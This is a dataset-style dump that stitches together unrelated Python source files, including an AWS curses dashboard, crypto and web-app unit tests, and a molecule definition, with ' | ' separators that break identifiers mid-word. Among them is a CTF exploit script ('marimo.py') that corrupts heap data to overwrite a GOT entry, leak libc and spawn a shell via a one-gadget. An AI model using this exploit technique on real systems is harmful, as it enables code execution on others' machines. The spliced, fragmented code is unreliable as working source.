from curses import wrapper
from artifact.stats import autoscalinggroups
from artifact.stats import ec2
from artifact.stats import elasticloadbalancers
from artifact.stats import launchconfigurations
from artifact.stats import securitygroups
from artifact.stats import subnets
from artifact.stats import vpcs
def paint_box(stdscr, width, start_y, start_x, heading, fieldsets):
"""Paint a number of (text) fields in a box on the screen."""
indent = 2
padding = width - (len(heading) + 1)
full_heading = " " + heading
if padding > 0:
for x in range(padding):
full_heading += " "
stdscr.addstr(start_y, start_x, full_heading, curses.A_REVERSE)
start_y += 1
for i, fieldset in enumerate(fieldsets):
start_y += 1
for line, field in enumerate(fieldset):
if line == 0:
stdscr.addstr(
start_y,
start_x,
"- " + str(field),
curses.A_BOLD)
else:
stdscr.addstr(
start_y,
start_x + indent,
str(field))
start_y += 1
def show_vpcs(stdscr):
"""Fetch and paint stats about VCPs."""
data = vpcs.get_vpcs()
width = 20
start_y = 0
start_x = 0
heading = "VPCs"
fieldsets = []
for i, datum in enumerate(data):
vpc_id = datum.get("VpcId")
cidr_block = datum.get("CidrBlock")
status = datum.get("State")
default = "Default VPC" if datum.get("IsDefault") else ""
vpc_name = "<Unnamed>"
if datum.get("Tags"):
tags = datum.get("Tags")
for tag in tags:
if tag.get("Key") == "Name":
vpc_name = tag.get("Value")
fieldsets.append([
vpc_name,
vpc_id,
cidr_block,
status,
default,
])
paint_box(stdscr, width, start_y, start_x, heading, fieldsets)
def show_subnets(stdscr):
"""Fetch and paint stats about subnets."""
data = subnets.get_subnets()
width = 20
start_y = 0
start_x = 25
heading = "Subnets"
fieldsets = []
for datum in data:
fieldset = []
subnet_id = datum.get("SubnetId")
vpc_id = datum.get("VpcId")
cidr_block = datum.get("CidrBlock")
availability_zone = datum.get("AvailabilityZone")
subnet_name = "<Unnamed>"
if datum.get("Tags"):
tags = datum.get("Tags")
for tag in tags:
if tag.get("Key") == "Name":
subnet_name = tag.get("Value")
fieldset.append(subnet_name)
fieldset.append(subnet_id)
fieldset.append(vpc_id)
fieldset.append(cidr_block)
fieldset.append(availability_zone)
fieldsets.append(fieldset)
paint_box(stdscr, width, start_y, start_x, heading, fieldsets)
def show_auto_scaling_groups(stdscr):
"""Fetch and paint stats about auto scaling groups."""
data = autoscalinggroups.get_auto_scaling_groups()
width = 20
start_y = 0
start_x = 50
heading = "Auto Scale Groups"
fieldsets = []
for datum in data:
fieldset = []
group_name = datum.get("AutoScalingGroupName")
launch_config = datum.get("LaunchConfigurationName")
min_size = datum.get("MinSize")
max_size = datum.get("MaxSize")
desired_size = datum.get("DesiredCapacity")
availability_zones = datum.get("AvailabilityZones")
elastic_load_balancers = datum.get("LoadBalancerNames")
instances = []
instance_list = datum.get("Instances")
if instance_list:
for instance in instance_list:
instance_id = instance.get("InstanceId")
instance_zone = instance.get("AvailabilityZone")
instance_status = instance.get("LifecycleState")
instance_health = instance.get("HealthStatus")
instances.append(instance_id)
instances.append(instance_zone)
instances.append(instance_status)
instances.append(instance_health)
fieldset.append(group_name)
if launch_config:
fieldset.append(launch_config)
size = str(min_size) + " " + str(max_size) + " " + str(desired_size)
fieldset.append(size)
if availability_zones:
fieldset += availability_zones
if elastic_load_balancers:
fieldset += elastic_load_balancers
if instances:
fieldset += instances
fieldsets.append(fieldset)
paint_box(stdscr, width, start_y, start_x, heading, fieldsets)
def show_ec2_instances(stdscr):
"""Fetch and paint stats about EC2 instances."""
data = ec2.get_instances()
width = 20
start_y = 0
start_x = 75
heading = "Instances"
fieldsets = []
for i, datum in enumerate(data):
fieldset = []
instance_id = datum.get("InstanceId")
status = datum.get("State").get("Name")
if status == "terminated":
continue
private_dnsname = datum.get("PrivateDnsName")
public_dnsname = datum.get("PublicDnsName")
instance_type = datum.get("InstanceType")
subnet_id = datum.get("SubnetId")
vpc_id = datum.get("VpcId")
private_ip = datum.get("PrivateIpAddress")
public_ip = datum.get("PublicIpAddress")
instance_name = "<Unna | med>"
if datum.get("Tags"):
tags = datum.get("Tags")
for tag in tags:
if tag.get("Key") == "Name":
instance_name = tag.get("Value")
security_groups = []
if datum.get("SecurityGroups"):
sgs = datum.get("SecurityGroups")
for sg in sgs:
group_name = sg.get("GroupName")
group_id = sg.get("GroupId")
| security_groups.append(group_name + " " + group_id)
fieldset.append(instance_name)
fieldset.append(instance_id)
fieldset.append(instance_type)
fieldset.append(status)
if private_dnsname:
fieldset.append(private_dnsname)
if private_ip:
fieldset.append(private_ip)
if public_dnsname:
fieldset.append(public_dnsname)
if public_ip:
fieldset.append(public_ip)
fieldset.append(vpc_id)
fieldset.append(subnet_id)
if security_groups:
fieldset.append(", ".join(security_groups))
fieldsets.append(fieldset)
paint_box(stdscr, width, start_y, start_x, heading, fieldsets)
def show_elastic_load_balancers(stdscr):
"""Fetch and paint stats about elastic load balancers."""
data = elasticloadbalancers.get_elastic_load_balancers()
width = 35
start_y = 28
start_x = 25
heading = "Elastic Load Balancers"
fieldsets = []
for i, datum in enumerate(data):
fieldset = []
elb_name = datum.get("LoadBalancerName")
dns_name = datum.get("DNSName")
if datum.get("ListenerDescriptions"):
listeners = datum.get("ListenerDescriptions")
protocols = []
ports = []
instance_protocols = []
instance_ports = []
ssl_cert_ids = []
if listeners:
for listener in listeners:
protocol = listener.get("Protocol")
protocols.append(str(protocol))
port = listener.get("LoadBalancerPort")
ports.append(str(port))
instance_protocol = listener.get("InstanceProtocol")
instance_protocols.append(str(instance_protocol))
instance_port = listener.get("InstancePort")
instance_ports.append(str(instance_port))
ssl_cert_id = listener.get("SSLCertificateId")
ssl_cert_ids.append(str(ssl_cert_id))
instances = []
|
scwuaptx/CTF | 2018-writeup/codegate/marimo.py | Python | gpl-2.0 | 1,472 | 0.011549 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import time
host = "10.211.55.6"
port = 8888
host = "ch41l3ng3s.codegate.kr"
port = 3333
r = remote(host,port)
def sell(idx):
r.recvuntil(">>")
r.sendline("S")
r.recvuntil(">>")
r.sendline(str(idx))
r.recvuntil("?")
r.sendline("S")
def buy(size,name,pr):
r.recvuntil(">>")
r.sendline("B")
r.recvuntil(">>")
r.sendline(str(size))
r.recvuntil(">>")
r.sendline("P")
r.recvuntil(">>")
r.sendline(name)
r.recvuntil(">>")
r.sendline(pr)
def view(idx,profile=None):
r.recvuntil(">>") |
r.sendline("V")
r.recvuntil(">>")
r.sendline(str(idx))
data = r.recvuntil(">>")
if profile :
r.sendline("M")
r.recvuntil(">>")
r.sendline(profile)
return data
else :
r.sendline("B")
return data
puts_got = 0x603018
r.recvuntil(">>")
r.sendline("show me the marimo")
r.recvuntil(">>")
r.sendline("Aa")
r.recvuntil(">>")
r.sendline("orange")
time.sleep(1)
sell(0)
buy(1,"d | anogg","fuck")
buy(1,"orange","fuck")
time.sleep(3)
data = view(0)
ctime = int(data.split("current time :")[1].split("\n")[0].strip())
view(0,"a"*0x30 + p32(ctime) + p32(1) + p64(puts_got) + p64(puts_got))
r.recvuntil(">>")
r.sendline("B")
data = view(1)
libc = u64(data.split("name :")[1].split("\n")[0].strip().ljust(8,"\x00")) - 0x6f690
print hex(libc)
magic = libc + 0x45216
view(1,p64(magic))
r.interactive()
|
dtulyakov/py | intuit/test2.py | Python | gpl-2.0 | 255 | 0.038835 | #!/usr/bin/env python2
# -* | - coding: utf-8 -*-
import os, sys
try:
s = "qwertyu"
while s != "":
print s
s = s[1:-1]
# print "Просто муйня"
except:
print "При выполнении прогр | аммы возникла проблема!"
|
xueyumusic/pynacl | tests/test_box.py | Python | apache-2.0 | 7,660 | 0 | # Copyright 2013 Donald Stufft and individual contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
import binascii
import pytest
from nacl.encoding import HexEncoder
from nacl.exceptions import CryptoError
from nacl.public import Box, PrivateKey, PublicKey
VECTORS = [
# privalice, pubalice, privbob, pubbob, nonce, plaintext, ciphertext
(
b"77076d0a7318a57d3c16c17251b26645df4c2f87ebc0992ab177fba51db92c2a",
b"8520f0098930a754748b7ddcb43ef75a0dbf3a0d26381af4eba4a98eaa9b4e6a",
b"5dab087e624a8a4b79e17f8b83800ee66f3bb1292618b6fd1c2f8b27ff88e0eb",
b"de9edb7d7b7dc1b4d35b61c2ece435373f8343c85b78674dadfc7e146f882b4f",
b"69696ee955b62b73cd62bda875fc73d68219e0036b7a0b37",
(b"be075fc53c81f2d5cf141316ebeb0c7b5228c52a4c62cbd44b66849b64244ffce5e"
b"cbaaf33bd751a1ac728d45e6c61296cdc3c01233561f41db66cce314adb310e3be8"
b"250c46f06dceea3a7fa1348057e2f6556ad6b1318a024a838f21af1fde048977eb4"
b"8f59ffd4924ca1c60902e52f0a089bc76897040e082f937763848645e0705"),
(b"f3ffc7703f9400e52a7dfb4b3d3305d98e993b9f48681273c29650ba32fc76ce483"
b"32ea7164d96a4476fb8c531a1186ac0dfc17c98dce87b4da7f011ec48c97271d2c2"
b"0f9b928fe2270d6fb863d51738b48eeee314a7cc8ab932164548e526ae902243685"
b"17acfeabd6bb3732bc0e9da99832b61ca01b6de56244a9e88d5f9b37973f622a43d"
b"14a6599b1f654cb45a74e355a5"),
),
]
def test_generate_private_key():
PrivateKey.generate()
def test_box_creation():
pub = PublicKey(
b"ec2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
priv = PrivateKey(
b"5c2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
Box(priv, pub)
def test_box_decode():
pub = PublicKey(
b"ec2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
priv = PrivateKey(
b"5c2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
b1 = Box(priv, pub)
b2 = Box.decode(b1._shared_key)
assert b1._shared_key == b2._shared_key
def test_box_bytes():
pub = PublicKey(
b"ec2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
priv = PrivateKey(
b"5c2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
b = Box(priv, pub)
assert bytes(b) == b._shared_key
@pytest.mark.par | ametrize(
(
"privalice", "pubalice", "privbob", | "pubbob", "nonce", "plaintext",
"ciphertext",
),
VECTORS,
)
def test_box_encryption(
privalice, pubalice, privbob, pubbob, nonce, plaintext, ciphertext):
pubalice = PublicKey(pubalice, encoder=HexEncoder)
privbob = PrivateKey(privbob, encoder=HexEncoder)
box = Box(privbob, pubalice)
encrypted = box.encrypt(
binascii.unhexlify(plaintext),
binascii.unhexlify(nonce),
encoder=HexEncoder,
)
expected = binascii.hexlify(
binascii.unhexlify(nonce) + binascii.unhexlify(ciphertext),
)
assert encrypted == expected
assert encrypted.nonce == nonce
assert encrypted.ciphertext == ciphertext
@pytest.mark.parametrize(
(
"privalice", "pubalice", "privbob", "pubbob", "nonce", "plaintext",
"ciphertext",
),
VECTORS,
)
def test_box_decryption(
privalice, pubalice, privbob, pubbob, nonce, plaintext, ciphertext):
pubbob = PublicKey(pubbob, encoder=HexEncoder)
privalice = PrivateKey(privalice, encoder=HexEncoder)
box = Box(privalice, pubbob)
nonce = binascii.unhexlify(nonce)
decrypted = binascii.hexlify(
box.decrypt(ciphertext, nonce, encoder=HexEncoder),
)
assert decrypted == plaintext
@pytest.mark.parametrize(
(
"privalice", "pubalice", "privbob", "pubbob", "nonce", "plaintext",
"ciphertext",
),
VECTORS,
)
def test_box_decryption_combined(
privalice, pubalice, privbob, pubbob, nonce, plaintext, ciphertext):
pubbob = PublicKey(pubbob, encoder=HexEncoder)
privalice = PrivateKey(privalice, encoder=HexEncoder)
box = Box(privalice, pubbob)
combined = binascii.hexlify(
binascii.unhexlify(nonce) + binascii.unhexlify(ciphertext),
)
decrypted = binascii.hexlify(box.decrypt(combined, encoder=HexEncoder))
assert decrypted == plaintext
@pytest.mark.parametrize(
(
"privalice", "pubalice", "privbob", "pubbob", "nonce", "plaintext",
"ciphertext",
),
VECTORS,
)
def test_box_failed_decryption(
privalice, pubalice, privbob, pubbob, nonce, plaintext, ciphertext):
pubbob = PublicKey(pubbob, encoder=HexEncoder)
privbob = PrivateKey(privbob, encoder=HexEncoder)
# this cannot decrypt the ciphertext! the ciphertext must be decrypted by
# (privalice, pubbob) or (privbob, pubalice)
box = Box(privbob, pubbob)
with pytest.raises(CryptoError):
box.decrypt(ciphertext, binascii.unhexlify(nonce), encoder=HexEncoder)
def test_box_wrong_length():
with pytest.raises(ValueError):
PublicKey(b"")
with pytest.raises(ValueError):
PrivateKey(b"")
pub = PublicKey(
b"ec2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
priv = PrivateKey(
b"5c2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
b = Box(priv, pub)
with pytest.raises(ValueError):
b.encrypt(b"", b"")
with pytest.raises(ValueError):
b.decrypt(b"", b"")
def check_type_error(expected, f, *args):
with pytest.raises(TypeError) as e:
f(*args)
assert expected in str(e)
def test_wrong_types():
priv = PrivateKey.generate()
check_type_error("PrivateKey must be created from a 32 byte seed",
PrivateKey, 12)
check_type_error("PrivateKey must be created from a 32 byte seed",
PrivateKey, priv)
check_type_error("PrivateKey must be created from a 32 byte seed",
PrivateKey, priv.public_key)
check_type_error("PublicKey must be created from 32 bytes",
PublicKey, 13)
check_type_error("PublicKey must be created from 32 bytes",
PublicKey, priv)
check_type_error("PublicKey must be created from 32 bytes",
PublicKey, priv.public_key)
check_type_error("Box must be created from a PrivateKey and a PublicKey",
Box, priv, "not a public key")
check_type_error("Box must be created from a PrivateKey and a PublicKey",
Box, priv.encode(), priv.public_key.encode())
check_type_error("Box must be created from a PrivateKey and a PublicKey",
Box, priv, priv.public_key.encode())
check_type_error("Box must be created from a PrivateKey and a PublicKey",
Box, priv.encode(), priv.public_key)
|
pulsar-chem/Pulsar-Core | lib/systems/l-glutamic_acid.py | Python | bsd-3-clause | 1,099 | 0.00091 | i | mport pulsar as psr
def load_ref_system():
""" Returns l-glutamic_acid as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
N 0.1209 -2.2995 -0.2021
C 0.4083 -0.9510 -0.7668
C -0.0197 0.1567 0.2036
H 0.2953 -0.0889 1.2387
H | 0.5152 1.0936 -0.0551
C -1.5226 0.3991 0.1502
H -1.8462 0.6291 -0.8851
H -2.0847 -0.5077 0.4535
C -1.8924 1.5597 1.0413
O -1.8774 2.7496 0.7858
O -2.3012 1.2232 2.2867
H -2.5017 2.0069 2.7891
C 1.9123 -0.8901 -1.0205
O 2.3094 -1.5372 -2.1437
O 2.7925 -0.3483 -0.3817
H 0.2282 -2.9904 -0.9133
H -0.8129 -2.3188 0.1500
H -0.1109 -0.7851 -1.7497
H 3.2561 -1.4867 -2.2319
""")
|
msfrank/Higgins | higgins/upnp/logger.py | Python | lgpl-2.1 | 296 | 0.006757 | # Higgins - A multi-media server
# Copyright (c) 2007-2009 Michael Frank <msfrank@syntaxjockey.com>
#
# This program is free software; for license information see
# the COPYING file.
from higgins.logger im | port Loggable
class UPnPLogger(Logg | able):
log_domain = "upnp"
logger = UPnPLogger()
|
uwkejia/Clean-Energy-Outlook | examples/Extra/Codes/SVR_nuclear.py | Python | mit | 1,586 | 0.019546 | def read_data(file_name):
return pd.read_csv(file_name)
def preprocess(data):
# Data Preprocessing
data['GDP_scaled']=preprocessing.scale(data['GDP'])
data['CLPRB_scaled']=preprocessing.scale(data['CLPRB'])
data['EMFDB_scaled']=preprocessing.scale(data['EMFDB'])
data['ENPRP_scaled']=preprocessing.scale(data['ENPRP'])
data['NGMPB_scaled']=preprocessing.scale(data['NG | MPB'])
data['PAPRB_scaled']=preprocessing.scale(data['PAPRB'])
data['PCP_scaled']=preprocessing.scale(data['PCP'])
data['ZNDX_scaled']=preprocessing.scale(data['ZNDX'])
data[' | OP_scaled']=preprocessing.scale(data['Nominal Price'])
data['OP2_scaled']=preprocessing.scale(data['Inflation Adjusted Price'])
return data
def split_data(data):
# Split data for train and test
all_x = data[['GDP_scaled','CLPRB_scaled','EMFDB_scaled','ENPRP_scaled','NGMPB_scaled','PAPRB_scaled','PCP_scaled','ZNDX_scaled','OP_scaled', 'OP2_scaled']][:55]
all_y = data[['NUETP']][:55]
return cross_validation.train_test_split(all_x, all_y, test_size=0.2, random_state=0)
# SVR for nuclear
def SVR_predict(X_train, X_test, y_train, y_test):
clf = SVR(kernel='sigmoid', C=90.0, epsilon=0.3).fit(X_train, y_train)
print(clf.score(X_test, y_test))
future_x = data[['GDP_scaled','CLPRB_scaled','EMFDB_scaled','ENPRP_scaled','NGMPB_scaled','PAPRB_scaled','PCP_scaled','ZNDX_scaled','OP_scaled','OP2_scaled']][-6:]
pred = pd.DataFrame(clf.predict(future_x))
pred.columns = [statelist[i]]
result = pd.concat([result, pred], axis=1)
return result
|
cpennington/edx-platform | openedx/core/djangoapps/user_api/accounts/tests/test_api.py | Python | agpl-3.0 | 25,510 | 0.003652 | # -*- coding: utf-8 -*-
"""
Unit tests for behavior that is specific to the api methods (vs. the view methods).
Most of the functionality is covered in test_views.py.
"""
import itertools
import unicodedata
import ddt
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.test import TestCase
from django.test.client import RequestFactory
from django.urls import reverse
from mock import Mock, patch
from six import iteritems
from social_django.models import UserSocialAuth
from student.models import (
AccountRecovery,
PendingEmailChange,
PendingSecondaryEmailChange,
UserProfile
)
from student.tests.factories import UserFactory
from student.tests.tests import UserSettingsEventTestMixin
from student.views.management import activate_secondary_email
from openedx.core.djangoapps.ace_common.tests.mixins import EmailTemplateTagMixin
from openedx.core.djangoapps.user_api.accounts import PRIVATE_VISIBILITY
from openedx.core.djangoapps.user_api.accounts.api import (
get_account_settings,
update_account_settings
)
from openedx.core.djangoapps.user_api.accounts.tests.retirement_helpers import ( # pylint: disable=unused-import
RetirementTestCase,
fake_requested_retirement,
setup_retirement_states
)
from openedx.core.djangoapps.user_api.errors import (
AccountUpdateError,
AccountValidationError,
UserNotAuthorized,
UserNotFound
)
from openedx.core.djangolib.testing.utils import skip_unless_lms
from openedx.features.enterprise_support.tests.factories import EnterpriseCustomerUserFactory
def mock_render_to_string(template_name, context):
"""Return a string that encodes template_name and context"""
return str((template_name, sorted(iteritems(context))))
def mock_render_to_response(template_name):
"""
Return an HttpResponse with content that encodes template_name and context
"""
# This simulates any db access in the templates.
UserProfile.objects.exists()
return HttpResponse(template_name)
class CreateAccountMixin(object):
def create_account(self, username, password, email):
# pylint: disable=missing-docstring
registration_url = reverse('user_api_registration')
resp = self.client.post(registration_url, {
'username': username,
'email': email,
'password': password,
'name': username,
'honor_code': 'true',
})
self.assertEqual(resp.status_code, 200)
@skip_unless_lms
@ddt.ddt
@patch('student.views.management.render_to_response', Mock(side_effect=mock_render_to_response, autospec=True))
class TestAccountApi(UserSettingsEventTestMixin, EmailTemplateTagMixin, CreateAccountMixin, RetirementTestCase):
"""
These tests specifically cover the parts of the API methods that are not covered by test_views.py.
This includes the specific types of error raised, and default behavior when optional arguments
are not specified.
"""
password = "test"
def setUp(self):
super(TestAccountApi, self).setUp()
self.request_factory = RequestFactory()
self.table = "student_languageproficiency"
self.user = UserFactory.create(password=self.password)
self.default_request = self.request_factory.get("/api/user/v1/accounts/")
self.default_request.user = self.user
self.different_user = UserFactory.create(password=self.password)
self.staff_user = UserFactory(is_staff=True, password=self.password)
self.reset_tracker()
enterprise_patcher = patch('openedx.features.enterprise_support.api.enterprise_customer_for_request')
enterprise_learner_patcher = enterprise_patcher.start()
enterprise_learner_patcher.return_value = {}
self.addCleanup(enterprise_learner_patcher.stop)
def test_get_username_provided(self):
"""Test the difference in behavior when a username is supplied to get_account_settings."""
account_settings = get_account_settings(self.default_request)[0]
self.assertEqual(self.user.username, account_settings["username"])
account_settings = get_account_settings(self.default_request, usernames=[self.user.username])[0]
self.assertEqual(self.user.username, account_settings["username"])
account_settings = get_account_settings(self.default_request, usernames=[self.different_user.username])[0]
self.assertEqual(self.different_user.username, account_settings["username"])
def test_get_configuration_provided(self):
"""Test the difference in behavior when a configuration is supplied to get_account_settings."""
config = {
"default_visibility": "private",
"public_fields": [
'email', 'name',
],
}
# With default configuration settings, email is not shared with other (non-staff) users.
account_settings = get_account_settings(self.default_request, [self.different_user.username])[0]
self.assertNotIn("email", account_settings)
account_settings = get_account_settings(
self.default_request,
[self.different_user.username],
configuration=config,
)[0]
self.assertEqual(self.different_user.email, account_settings["email"])
def test_get_user_not_found(self):
"""Test that UserNotFound is thrown if there is no user with username."""
with self.assertRaises(UserNotFound):
get_account_settings(self.default_request, usernames=["does_not_exist"])
self.user.username = "does_not_exist"
request = self.request_factory.get("/api/user/v1/accounts/")
request.user = self.user
with self.assertRaises(UserNotFound):
get_account_settings(request)
def test_update_username_provided(self):
"""Test the difference in behavior when a username is supplied to update_account_settings."""
update_account_settings(self.user, {"name": "Mickey Mouse"})
account_settings = get_account_settings(self.default_request)[0]
self.assertEqual("Mickey Mouse", account_settings["name"])
update_account_settings(self.user, {"name": "Donald Duck"}, username=self.user.username)
account_settings = get_account_settings(self.default_request)[0]
self.assertEqual("Donald Duck", account_settings["name"])
with self.assertRaises(UserNotAuthorized):
update_account_settings(self.different_user, {"name": "Pluto"}, username=s | elf.user.username)
def test_update_non_existent_user(self):
with self.assertRaises(UserNotAuthorized):
| update_account_settings(self.user, {}, username="does_not_exist")
self.user.username = "does_not_exist"
with self.assertRaises(UserNotFound):
update_account_settings(self.user, {})
def test_get_empty_social_links(self):
account_settings = get_account_settings(self.default_request)[0]
self.assertEqual(account_settings['social_links'], [])
def test_set_single_social_link(self):
social_links = [
dict(platform="facebook", social_link="https://www.facebook.com/{}".format(self.user.username))
]
update_account_settings(self.user, {"social_links": social_links})
account_settings = get_account_settings(self.default_request)[0]
self.assertEqual(account_settings['social_links'], social_links)
def test_set_multiple_social_links(self):
social_links = [
dict(platform="facebook", social_link="https://www.facebook.com/{}".format(self.user.username)),
dict(platform="twitter", social_link="https://www.twitter.com/{}".format(self.user.username)),
]
update_account_settings(self.user, {"social_links": social_links})
account_settings = get_account_settings(self.default_request)[0]
self.assertEqual(account_settings['social_links'], social_links)
def test_add_social_links(self):
original_social_links = [
dict(platform="faceb |
orlade/microsimmer | host/server/transformer.py | Python | mit | 2,039 | 0.000981 | FILE_PREFIX = '__file__'
class Form | Transformer(object):
"""
Deserializes requests constructed by HTML forms, and serializes results to
JSON.
"""
def parse(self, request, service_params):
"""
Parses the parameter values in the request to a list with the order of
the given service_params.
"""
# TODO(orlade): Read types from IDL.
args = []
for param in service_params:
# Check files first. Empty if no files uploaded.
file_param | = FILE_PREFIX + param
if file_param in request.files.keys():
value = self.parse_value(
request.files.get(file_param).file.read())
args.append(value)
elif param in request.params:
value = self.parse_value(request.params[param])
args.append(value)
return args
def parse_display(self, request, service_params):
"""
Parses the request arguments into a dictionary.
"""
# TODO(orlade): Deduplicate logic for rendering.
args = {}
for param in service_params:
# Check files first. Empty if no files uploaded.
file_param = FILE_PREFIX + param
if file_param in request.files.keys():
# Return the filename for display instead of the contents.
args[param] = request.files.get(file_param).filename
elif param in request.params:
args[param] = self.parse_value(request.params[param])
return args
def parse_value(self, value):
"""
Converts the given string to the appropriate Python type.
"""
try:
return int(value)
except:
try:
return float(value)
except:
pass
return value
def serialize(self, results):
"""
Converts the given Python object into a string for the client.
"""
return results
|
shaftoe/home-assistant | homeassistant/components/calendar/demo.py | Python | apache-2.0 | 2,739 | 0 | """
Demo platform that has two fake binary sensors.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/demo/
"""
import homeassistant.util.dt as dt_util
from homeassistant.components.calendar import CalendarEventDevice
from homeassistant.components.google import CONF_DEVICE_ID, CONF_NAME
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Demo Calendar platform."""
calendar_data_future = DemoGoogleCalendarDataFuture()
calendar_data_current = DemoGoogleCalendarDataCurrent()
add_devices([
DemoGoogleCalendar(hass, calendar_data_future, {
CONF_NAME: 'Future Event',
CONF_DEVICE_ID: 'future_event',
}),
DemoGoogleCalendar(hass, calendar_data_current, {
CONF_NAME: 'Current Event',
CONF_DEVICE_ID: 'current_event',
}),
])
class DemoGoogleCalendarData(object):
"""Representation of a Demo Calendar element."""
# pylint: disable=no-self-use
def update(self):
"""Return true so entity knows we have new data."""
return True
class DemoGoogleCalendarDataFuture(DemoGoogleCalendarData):
"""Representation of a Demo Calendar for a future event."""
def __init__(self):
"""Set the event to a future event."""
one_hour_from_now = dt_util.now() \
+ dt_util.dt.timedelta(minutes=30)
self.event = {
'start': {
'dateTime': one_hour_from_now.isoformat()
},
'end': {
'dateTime': (one_hour_from_now + dt_util.dt.
timedelta(minutes=60)).isoformat()
},
'summary': 'Future Event',
}
class DemoGoogleCalendarDataCurrent(DemoGoogleCalendarData):
"""Representation of a Demo Calendar for a current event."""
def __init__(self):
| """Set the event data."""
middle_of_event = dt_util.now() \
- dt_util.dt.timedelta(minutes=30)
self.event = {
'start': {
'dateTime': middle_of_event.isoformat()
},
'end': {
'dateTime': (middle_of_event + dt_util.dt. |
timedelta(minutes=60)).isoformat()
},
'summary': 'Current Event',
}
class DemoGoogleCalendar(CalendarEventDevice):
"""Representation of a Demo Calendar element."""
def __init__(self, hass, calendar_data, data):
"""Initialize Google Calendar but without the API calls."""
self.data = calendar_data
super().__init__(hass, data)
|
anhstudios/swganh | data/scripts/templates/object/tangible/furniture/plain/shared_plain_coffee_table_s01.py | Python | mit | 463 | 0.047516 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MOD | IFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/furniture/plain/shared_plain_coffee_table_s01.iff"
result.attribute_template_id = 6
result.stfName("frn_n","frn_coffee_table")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
|
return result |
tinloaf/home-assistant | tests/components/test_rest_command.py | Python | apache-2.0 | 10,394 | 0 | """The tests for the rest command platform."""
import asyncio
import aiohttp
import homeassistant.components.rest_command as rc
from homeassistant.setup import setup_component
from tests.common import (
get_test_home_assistant, assert_setup_component)
class TestRestCommandSetup:
"""Test the rest command component."""
def setup_method(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.config = {
rc.DOMAIN: {'test_get': {
'url': 'http://example.com/'
}}
}
def teardown_method(self):
"""Stop everything that was started."""
self.hass.stop()
def test_setup_component(self):
"""Test setup component."""
with assert_setup_component(1):
setup_component(self.hass, rc.DOMAIN, self.config)
def test_setup_component_timeout(self):
"""Test setup component timeout."""
self.config[rc.DOMAIN]['test_get']['timeout'] = 10
with assert_setup_component(1):
setup_component(self.hass, rc.DOMAIN, self.config)
def test_setup_component_test_service(self):
"""Test setup component and check if service exits."""
with assert_setup_component(1):
setup_component(self.hass, rc.DOMAIN, self.config)
assert self.hass.services.has_service(rc.DOMAIN, 'test_get')
class TestRestCommandComponent:
"""Test the rest command component."""
def setup_method(self):
"""Set up things to be run when tests are started."""
self.url = "https://example.com/"
self.config = {
rc.DOMAIN: {
'get_test': {
'url': self.url,
'method': 'get',
},
'post_test': {
'url': self.url,
'method': 'post',
},
'put_test': {
'url': self.url,
'method': 'put',
},
'delete_test': {
'url': self.url,
'method': 'delete',
},
}
}
self.hass = get_test_home_assistant()
def teardown_method(self):
"""Stop everything that was started."""
self.hass.stop()
def test_setup_tests(self):
"""Set up test config and test it."""
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
assert self.hass.services.has_service(rc.DOMAIN, 'get_test')
assert self.hass.services.has_service(rc.DOMAIN, 'post_test')
assert self.hass.services.has_service(rc.DOMAIN, 'put_test')
assert self.hass.services.has_service(rc.DOMAIN, 'delete_test')
def test_rest_command_timeout(self, aioclient_mock):
"""Call a rest command with timeout."""
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.get(self.url, exc=asyncio.TimeoutError())
self.hass.services.call(rc.DOMAIN, 'get_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
def test_rest_command_aiohttp_error(self, aioclient_mock):
"""Call a rest command with aiohttp exception."""
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.get(self.url, exc=aiohttp.ClientError())
self.hass.services.call(rc.DOMAIN, 'get_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
def test_rest_command_http_error(self, aioclient_mock):
"""Call a rest command with status code 400."""
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.get(self.url, status=400)
self.hass.services.call(rc.DOMAIN, 'get_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
def test_rest_command_auth(self, aioclient_mock):
"""Call a rest command with auth credential."""
data = {
'username': 'test',
'password': '123456',
}
self.config[rc.DOMAIN]['get_test'].update(data)
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.get(self.url, content=b'success')
self.hass.services.call(rc.DOMAIN, 'get_test', {})
